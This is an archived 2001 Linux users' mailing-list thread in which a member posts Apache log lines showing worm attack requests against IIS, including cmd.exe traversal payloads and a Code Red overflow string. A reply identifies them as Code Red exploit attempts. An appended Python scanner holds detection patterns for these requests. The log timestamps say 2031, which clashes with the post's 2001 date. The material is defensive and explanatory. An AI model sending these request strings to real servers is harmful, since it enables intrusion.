[wplug] weird apache logs

jsbillings at mac.com
Thu Dec 27 18:31:19 EST 2001


The URLs that consist of lots of NNNN or XXX are exploit attempts on IIS, 
classic buffer overflow attacks.  The URLs with cmd.exe or other 
Windows-looking programs are attempts to make use of the results of the 
exploit.  It's rarely an attack from the person whose machine it's 
coming from; these attacks (Code Red and variants) are built to attack 
other machines.  You could fire off a note to the owner of the domain, 
to let them know they've been infected.  This is actually a pretty old 
exploit; I've been seeing it for months.

On Thursday, December 27, 2001, at 02:19  PM, coldfire wrote:

> I've been getting some crazy GET requests in my logs ... my guess is 
> that
> they are some kind of NT or IIS exploits ... just not sure ... here are
> some ..
>
>
> 165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 275
> 165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 273
> 165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
> 165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
> 165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 314
> 165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 314
> 165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> system32/cmd.exe?/c+dir
> HTTP/1.0" 404 330
> 165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
> 165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
> 165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 165.229.57.211 - - [27/Dec/2031:00:39:35 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> another:
>
> 209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> a
> HTTP/1.0" 400 317
>
> ...
>
> I've received several of these from IPs which have no DNS entries or
> rDNS entries ... I'm not worried.  Just curious.
>
>
> coldie
>
> _______________________________________________
> wplug mailing list
> wplug at wplug.org
> http://www.wplug.org/mailman/listinfo/wplug
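The sorting jsbillings describes (Code Red's padded default.ida requests versus the cmd.exe/root.exe follow-ups behind encoded ".." traversal), written up as a small Apache-log scanner that tallies hits per source host so a note can go to the owner of that address block. This is an added example, not code from the thread; the signature names and the sample log lines are constructed for it.

```python
import re
from collections import defaultdict

# Apache common log format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Patterns for the request shapes discussed in the thread: Code Red's run of
# N padding on default.ida, and cmd.exe/root.exe invocations reached through
# (double-)encoded ".." traversal. Signature names are this example's own.
SIGNATURES = [
    ("code-red overflow", re.compile(r"/default\.ida\?[NX]{20,}", re.I)),
    ("cmd/root.exe exec", re.compile(r"/(cmd|root)\.exe\?/c\+", re.I)),
    ("encoded traversal", re.compile(r"\.\.(%25|%%|%c[01]%)", re.I)),
]

# Constructed sample lines modelled on the ones in the post (not the original log).
SAMPLE_LOG = [
    '165.229.57.211 - - [27/Dec/2001:00:39:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 275',
    '165.229.57.211 - - [27/Dec/2001:00:39:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297',
    '165.229.57.211 - - [27/Dec/2001:00:39:33 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280',
    '209.83.111.164 - - [19/Dec/2001:04:03:51 -0500] "GET /default.ida?' + "N" * 224 + '%u9090%u6858 HTTP/1.0" 400 317',
    '10.0.0.5 - - [27/Dec/2001:10:00:00 -0500] "GET /index.html HTTP/1.0" 200 1024',
]

def parse_line(line):
    """Split one access-log line into fields; None if it is not in common log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, ts, method, path, status, _size = m.groups()
    return {"host": host, "time": ts, "method": method, "path": path, "status": int(status)}

def classify(path):
    """Names of the signatures a request path matches (empty for ordinary traffic)."""
    return [name for name, rx in SIGNATURES if rx.search(path)]

def scan(lines):
    """Count matching requests per source host: {host: {signature: count}}."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec["path"]):
            hits[rec["host"]][tag] += 1
    return {host: dict(tags) for host, tags in hits.items()}

def report(hits):
    """One summary line per scanning host, usable in a note to the address owner."""
    return [f"{host}: " + ", ".join(f"{n} x {tag}" for tag, n in sorted(tags.items()))
            for host, tags in sorted(hits.items())]
```

Every request in the sample gets a 404 or 400 from Apache, which is the point of the thread: on a non-IIS server these are noise to report, not a compromise to clean up.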
